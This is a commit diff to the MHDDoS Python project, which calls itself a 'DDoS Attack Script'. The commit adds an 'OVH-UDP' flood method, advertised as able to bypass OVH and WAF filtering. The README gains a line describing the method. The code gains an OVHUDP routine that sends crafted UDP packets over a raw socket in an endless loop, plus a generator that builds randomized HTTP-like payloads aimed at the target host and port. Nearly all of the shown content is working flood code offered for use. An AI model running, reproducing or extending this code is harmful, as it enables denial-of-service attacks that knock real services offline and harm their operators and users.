Added OVH-UDP

This commit is contained in:
CirqueiraDev 2025-06-25 13:51:31 -03:00
parent e9d0e8da68
commit 608b38de68
2 changed files with 48 additions and 2 deletions

View File

@ -1,4 +1,4 @@
<h1 align="center">MHDDoS - DDoS Attack Script With 57 Methods</h1> <h1 align="center">MHDDoS - DDoS Attack Script With 58 Methods</h1>
<em><h5 align="center">(Programming Language - Python 3)</h5></em> <em><h5 align="center">(Programming Language - Python 3)</h5></em>
<p align="center"> <p align="center">
@ -49,6 +49,7 @@
* <img src="https://raw.githubusercontent.com/kgretzky/pwndrop/master/media/pwndrop-logo-512.png" width="16" height="16" alt="tcp"> TCP | TCP Flood Bypass * <img src="https://raw.githubusercontent.com/kgretzky/pwndrop/master/media/pwndrop-logo-512.png" width="16" height="16" alt="tcp"> TCP | TCP Flood Bypass
* <img src="https://styles.redditmedia.com/t5_2rxmiq/styles/profileIcon_snoob94cdb09-c26c-4c24-bd0c-66238623cc22-headshot.png" width="16" height="16" alt="udp"> UDP | UDP Flood Bypass * <img src="https://styles.redditmedia.com/t5_2rxmiq/styles/profileIcon_snoob94cdb09-c26c-4c24-bd0c-66238623cc22-headshot.png" width="16" height="16" alt="udp"> UDP | UDP Flood Bypass
* <img src="https://cdn-icons-png.flaticon.com/512/1918/1918576.png" width="16" height="16" alt="syn"> SYN | SYN Flood * <img src="https://cdn-icons-png.flaticon.com/512/1918/1918576.png" width="16" height="16" alt="syn"> SYN | SYN Flood
* <img src="https://static-00.iconduck.com/assets.00/ovh-icon-2048x2048-l4c3izvg.png" width="16" height="16" alt="ovh"> OVH-UDP | UDP flood with randomized HTTP-like headers and binary payloads to bypass OVH and WAF filters.
* <img src="https://cdn-icons-png.flaticon.com/512/1017/1017466.png" width="16" height="16" alt="cps"> CPS | Open and close connections with proxy * <img src="https://cdn-icons-png.flaticon.com/512/1017/1017466.png" width="16" height="16" alt="cps"> CPS | Open and close connections with proxy
* <img src="https://icon-library.com/images/icon-ping/icon-ping-28.jpg" width="16" height="16" alt="icmp"> ICMP | Icmp echo request flood (Layer3) * <img src="https://icon-library.com/images/icon-ping/icon-ping-28.jpg" width="16" height="16" alt="icmp"> ICMP | Icmp echo request flood (Layer3)
* <img src="https://s6.uupload.ir/files/1059643_g8hp.png" width="16" height="16" alt="connection"> CONNECTION | Open connection alive with proxy * <img src="https://s6.uupload.ir/files/1059643_g8hp.png" width="16" height="16" alt="connection"> CONNECTION | Open connection alive with proxy

View File

@ -128,7 +128,7 @@ class Methods:
LAYER4_METHODS: Set[str] = {*LAYER4_AMP, LAYER4_METHODS: Set[str] = {*LAYER4_AMP,
"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "TCP", "UDP", "SYN", "VSE", "MINECRAFT",
"MCBOT", "CONNECTION", "CPS", "FIVEM", "FIVEM-TOKEN", "MCBOT", "CONNECTION", "CPS", "FIVEM", "FIVEM-TOKEN",
"TS3", "MCPE", "ICMP", "DISCORD", "TS3", "MCPE", "ICMP", "DISCORD", "OVH-UDP",
} }
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS} ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
@ -401,6 +401,7 @@ class Layer4(Thread):
"MCPE": self.MCPE, "MCPE": self.MCPE,
"FIVEM": self.FIVEM, "FIVEM": self.FIVEM,
"FIVEM-TOKEN": self.FIVEMTOKEN, "FIVEM-TOKEN": self.FIVEMTOKEN,
"OVH-UDP": self.OVHUDP,
"DISCORD": self.DISCORD, "DISCORD": self.DISCORD,
"MINECRAFT": self.MINECRAFT, "MINECRAFT": self.MINECRAFT,
"CPS": self.CPS, "CPS": self.CPS,
@ -472,6 +473,14 @@ class Layer4(Thread):
continue continue
Tools.safe_close(s) Tools.safe_close(s)
def OVHUDP(self) -> None:
with socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while True:
for payload in self._generate_ovhudp():
Tools.sendto(s, payload, self._target)
Tools.safe_close(s)
def ICMP(self) -> None: def ICMP(self) -> None:
payload = self._genrate_icmp() payload = self._genrate_icmp()
s = None s = None
@ -582,6 +591,42 @@ class Layer4(Thread):
continue continue
Tools.safe_close(s) Tools.safe_close(s)
def _generate_ovhudp(self) -> List[bytes]:
packets = []
methods = ["PGET", "POST", "HEAD", "OPTIONS", "PURGE"]
paths = ['/0/0/0/0/0/0', '/0/0/0/0/0/0/', '\\0\\0\\0\\0\\0\\0', '\\0\\0\\0\\0\\0\\0\\', '/', '/null', '/%00%00%00%00']
for _ in range(randint(2, 4)):
ip = IP()
ip.set_ip_src(__ip__)
ip.set_ip_dst(self._target[0])
udp = UDP()
udp.set_uh_sport(randint(1024, 65535))
udp.set_uh_dport(self._target[1])
payload_size = randint(1024, 2048)
random_part = randbytes(payload_size).decode("latin1", "ignore")
method = randchoice(methods)
path = randchoice(paths)
payload_str = (
f"{method} {path}{random_part} HTTP/1.1\n"
f"Host: {self._target[0]}:{self._target[1]}\r\n\r\n"
)
payload = payload_str.encode("latin1", "ignore")
udp.contains(Data(payload))
ip.contains(udp)
packets.append(ip.get_packet())
return packets
def _generate_discord(self) -> bytes: def _generate_discord(self) -> bytes:
ip: IP = IP() ip: IP = IP()
ip.set_ip_src(__ip__) ip.set_ip_src(__ip__)